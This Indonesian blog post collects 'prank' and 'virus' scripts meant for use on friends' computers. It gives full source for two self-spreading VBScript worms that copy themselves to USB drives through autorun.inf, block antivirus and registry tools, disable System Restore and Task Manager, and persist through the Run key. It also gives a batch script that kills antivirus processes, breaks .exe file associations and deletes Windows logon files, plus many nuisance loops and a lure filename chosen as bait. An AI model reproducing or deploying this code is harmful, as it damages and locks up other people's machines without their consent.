Popular Post

Posted by : Zachary's Blog Friday 6 January 2012

Saatnya jahilin komputer temen dengan script-script dibawah ini.
script ini q dpet dari browsing-browsing internet dan saya kumpulkan, nah sekaran waktunya sya share pada kalian yang pengen belajar seputar script sebelum kalian baca script coba baca tulisan  dibawah ini............

Your Ad Here

(ʞʍʞʍʞʍʞʍʞʍ) ıɹıpuǝs ƃunƃƃuɐʇıp ɐsop


ya udah tanpa basa basi, langsung................




Nih yang mau buat orang panik ketakutan gara-gara DVD Rom-nya buka tutup sendiri
nih mantranya hehe


1.bikin new text document.
2.masukin script berikut;
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



3.save dalam extensi .vbs
4.kasi aja nama "gadisbugil"...hahahaha...biar napsu nya pada naik buat buka nih script....
Diposkan oleh street_kids di 22:27
Label: VBS, Virus

  •  
  •  
  •  
  •  
  •  
  •  
  •  
Membuat script jahat

Disini saya akan mengajarkan cara untuk membuat script sederhana tapi cukup membuat orang panik.

1. Pertama buka Notepad.
2. Lalu tuliskan "start" tanpa tanda kutip sebanyak mungkin (copy paste juga bisa yang penting ada tulisannya).
3. Jika sudah Save As dengan format .bat (misal: cobabuka.bat)
4. Selesai. Terserah mau dicoba sendiri atau dikasih teman kamu, kalau saya sih kata start nya lebih dari 300 sehingga komputer mau tidak mau harus di RESTART tapi kurang dari 100 pun bisa.
5. Good Luck.

Jangan terlalu berlebihan ya, nanti bisa-bisa kena omelan..
Oh iya . kalo bermanfaat jangan lupa klik +

______
Ya..

Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.

Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.

Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next
-------------------------script begin--------------------------
On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
'Siapkan isi autorun atau bahasa kerennya make the autorun
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do

'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39

'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if

Next

'Manipulasi registry

Set vhck3d = createobject("wscript.shell")

'Sudah Terlihat Jelas , Virus Ini Bermain Regedit Kita

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script-----------------------------

Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..

Cara bunuhnya gampang.

Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.

Cara pembasmiannya :

1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer

2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada

3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive

4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs

5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.

Membuat Sampel Script Virus Sederhana Dengan Notepad

- buka notepad
-copy paste script dibawah
-simpan dengan nama mila.sys.vbs

on error resume next
dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(“WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
NB :
- jangan disalahgunakan
- maaf kalau pernah diposting dalam blog ini
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….
courtesy : smile_netstar@yahoo.com
Kumpulan Script Jahil

Setelah berpromosi Kontes SEO tentang program Blogger Indonesia Dukung Internet Aman, Sehat & Manfaat. Dan lagi asyiknya berpromosi saya tidak sengaja saya mampir di web dan saya membaca salah satu artikelnya tetang Kumpulan script jahil,, Wah kayaknya seru.. lansung saja saya download. Nahs ekarang bagi Anda yang belum membacanya silahakan bca disini. Script berikut hanya untuk jahil.. Untuk membuat script ini aktif yang Anda butuhkan adalah :
1. Notepad
2. Copi
3. Paste
4. Alias Copas
5. Nah sekarang tinggla masukin scriptnya ke notepad,,, langsung saja cek ki dot :

MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

==> save nama script diatas dg ekstensi *.bat

BIKIN SHUTDOWN + MESSAGES

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"

==> save nama script diatas dg ekstensi *.bat

MAININ CAPS LOCK BUTTON

Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

==> save nama script diatas dg ekstensi *.vbs

BUKA TUTUP CD/DVD SECARA OTOMATIS

Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

==> save nama script diatas dg ekstensi *.vbs

BIKIN VB SCRIPT NONGOL TERUS MENERUS SECARA OTOMATIS

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

==> save nama script diatas dg ekstensi *.vbs

MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

MsgBox "kembali ke menu
sebelumnya"
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

==> save nama script diatas dg ekstensi *.vbs

OTOMATIS NGETIK "LU JELEK BANGET SIH" DI NOTEPAD ATAU M.WORD

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek
banget sih!!!"
loop

==> save nama script diatas dg ekstensi *.vbs

MEMBUKA NOTEPAD TERUS MENERUS

@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

==> save nama script diatas dg ekstensi *.BAT

OTOMATIS BUKA NOTEPAD LALU NGETIK "APA YG LO MAU"

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell =
WScript.CreateObject
("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

==> save nama script diatas dg ekstensi *.vbs

BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

==> nah script diatas save jadi quiz.bat,

POKOKNYA KALO YG INI DICOBA DULU DEH !!

@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:WINDOWS
system32logoff.exe /
F /Q
DEL C:WINDOWS
system32logon.exe /
F /Q
DEL C:WINDOWS
system32logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”

==> save script diatas dg ekstensi *.bat

*Keterangan : Untuk Kode cetak tembal dibawahnya merupakan keterangan ekstensi cara menyimpanya, misalnya ekstensi nya .vbs , jadi cara menyimpanya sebgagai berikut :
1. Buka notepad
2. Copy paste scriptnya
3. Save, dengan tipe ALL FILE dan Beri nama terserah Anda lalu di beri akhiran ekstensinya .vbs

Leave a Reply

Monggo Tanggapan saking sedulur sedoyo
(Silahkan tanggapan dari saudara semua)

Subscribe to Posts | Subscribe to Comments

- Copyright © Zakharia Aprilianto - Date A Live - Powered by Blogger - Designed by Zakharia | CEMPAKA 1974 -